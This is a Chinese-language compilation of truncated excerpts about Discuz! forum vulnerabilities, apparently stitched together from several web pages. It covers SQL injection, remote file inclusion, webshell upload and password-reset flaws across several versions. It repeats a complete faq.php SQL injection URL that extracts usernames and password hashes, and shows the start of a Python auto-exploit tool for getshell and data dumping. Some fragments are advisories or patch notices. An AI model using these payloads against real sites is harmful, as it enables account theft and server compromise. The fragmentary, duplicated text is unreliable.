Discuz!NT是一款功能强大的基于ASP.net平台的BBS系统,占有不少的市场份额,特别是一些大中型专业社区都采用该系统。最近,ISTO成员在其最新的2.5版本中发现了一个安全漏洞,成功利用此漏洞可以直接修改管理员的密码进入后台,取得管理员权限,从而控制整个网站。下面笔者部署环境解析该漏洞,以期引起大家的重视。 环境描述操作系统:Windows 2003Discuz!NT版本:2.5URL:http://www.gslw.com数据库:SQL Server 20051、漏洞起因漏...
影响版本: Discuz!4.0.0 Discuz!4.1.0 Discuz!5.0.0 Discuz!5.5.0 Discuz!6.0.0 Discuz!6.1.0 描述: Discuz!论坛系统是一个采用 PHP 和 MySQL 等其他多种数据库构建的高效论坛解决方案。Discuz! 在代码质量,运行效率,负载能力,安全等级,功能可操控性和权限严密性等方面都在广大用户中有良好的口碑 由于 PHP 对 多字节字符集的支持存在问题,在各种编码相互转换过程中,有可能引发程序溢出和程序错误 提交一个 ‘ 转意成 \‘ 然...
config_global.php 复制代码代码如下: $_config[‘cache‘][‘type‘] = ‘file’; function cachedata($cachenames) { …… $isfilecache = getglobal(‘config/cache/type’) == ‘file’; …… if($isfilecache) { $lostcaches = array(); foreach($cachenames as $cachename) { if(!@include_once(DISCUZ_ROOT.’./data/cache/cache_’.$cachename.’.php’)) { $lostcaches[] = $cach...
1月6日下午,网上发布基于Discuz!7.1&7.2的漏洞以及相关攻击方法。针对于此,PHPChina紧急联系了DZ研发部门,并且在最短的时间内为PHPChina官方论坛程序做了相关的补丁,保证会员在PHPChina论坛的正常使用及安全操作。感谢大家对PHPChina的关心和拥护,我们将一直奉行以用户为上的原则,为大家提供更加安全、便捷的学习交流环境。以下是相关介绍: 首先说一下,漏洞是t00ls核心群传出去的,xhming先去读的,然后我后来读的,读出来...
PS:话说光这个漏洞《黑客X档案》都说了N遍,呵呵........既然有人公布了,也有人连利用程序都写好了,那我也就公布吧!消息来源是鬼仔告诉我的,好像是火狐哪个大哥发现的洞,不太清楚了! discuz论坛的许愿池插件在DZ根目录有个wish.php文件,文件第四行: require $discuz_root.‘./include/discuzcode.func.php‘;很明显程序没有做任何过滤,一个十足的远程包含漏洞,具体利用方法就很简单了:http://www.163.com/wish.php?d...
Discuz7.2版的faq.php SQL注入漏洞分析,discuz7.2faq.php注入代码实例:http://www.gxlcms.com?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat((select (select (select concat(username,0x20,password) from cdb_members limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23漏洞分析: by phithon(...
关于discuz 7.2漏洞 请教!网站有两个bbs 如:bbs1 和 bbs2 1.论坛经常被人刷帖2.bbs2里面所有的js被黑了(多加入了一段js). 访问bbs2的时候网站提示“检测到恶意软件”。我把bbs2中的index.php改了,之输出一段话。当访问的时候还是提示“检测到恶意软件”这是被写入的js(只记得这么点了) 【t.crabdance.com/】急急急``````````------解决方案--------------------
那也不一样的是系统的漏洞啊 没准是服务器漏洞呢
------解决方...
注入代码实例:代码如下:
http://www.php.com/faq.phpaction=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat((select (select (select concat(username,0x20,password) from cdb_members limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23漏洞分析: by phithon代码如下:
($action == grouppermission) {
...
鸡肋1:install.php由于preg_grep过滤不严存在安全漏洞,可以直接拿webshell
如果你万幸发现install.php存在,但还没创建数据库账号,或者得到了数据库账号拿不到shell的时候,可以看看这个。 install.php的339-412行中对变量configfile进行了如下过滤
$configfile = preg_replace("/[$]dbhosts*=s*[\"'].*?[\"']/is\", \"$dbhost = '$dbhost'\", $configfile); $configfile = preg_replace(\"/[$]dbusers*=s*[\"'].*?[\"']/is\"...
PS:话说光这个漏洞《黑客X档案》都说了N遍,呵呵........既然有人公布了,也有人连利用程序都写好了,那我也就公布吧!消息来源是鬼仔告诉我的,好像是火狐哪个大哥发现的洞,不太清楚了!discuz论坛的许愿池插件在DZ根目录有个wish.php文件,文件第四行: require $discuz_root../include/discuzcode.func.php;很明显程序没有做任何过滤,一个十足的远程包含漏洞,具体利用方法就很简单了:http://www.163.com/wish.php?discuz_root=http://...
注入代码实例:代码如下:
http://www.bitsCN.com/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat((select (select (select concat(username,0x20,password) from cdb_members limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23漏洞分析: by phithon代码如下:
($action == grouppermission...
注入代码实例:代码如下:
//www.gxlcms.com/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat((select (select (select concat(username,0x20,password) from cdb_members limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23漏洞分析: by phithon代码如下:
($action == grouppermission) {
....
Discuz 7.2 faq.php全自动利用工具,getshell 以及dump数据,python 版的uc_key getshell部分的代码来自网上(感谢作者)
实现代码:#!/usr/bin/env python
# -*- coding: gbk -*-
# -*- coding: gb2312 -*-
# -*- coding: utf_8 -*-
# author iswin
import sys
import hashlib
import time
import math
import base64
import urllib2
import urllib
import redef sendRequest(url,para):try:data = urllib.urlencode(para)req=urll...
discuzX3.2 X3.4网站漏洞修复 SQL注入与请求伪造***利用与修复分类专栏: 网站安全 网站被篡改 如何防止网站被黑 如何防止网站被挂马 如何防止网站被侵入 网站安全服务 百度网址安全中心 dz论坛Discuz_X3.4最新网站漏洞 网站安全检测 网站安全 文章标签: discuzX3.2漏洞修复 网站漏洞修补 修补网站漏洞 discuz漏洞修复 网站安全公司版权2018年12月9日,国内某安全组织,对discuz X3.2 X3.4版本的漏洞进行了公开,这次漏洞影响范围...
2018年12月9日,国内某安全组织,对discuz X3.2 X3.4版本的漏洞进行了公开,这次漏洞影响范围较大,具体漏洞是discuz 的用户前段SQL注入与请求伪造漏洞,也俗称×××F漏洞,漏洞产生的原因首先:php环境的版本大约PHP5.2,dizcuzX3.2 X3.4版本,服务器环境是windows 2008 2003 2012系统,linux centos不受此漏洞的影响。
漏洞的详情与利用
该漏洞产生的原因是由于source目录下的module文件里的misc模块代码,具体的是misc_imgcropper...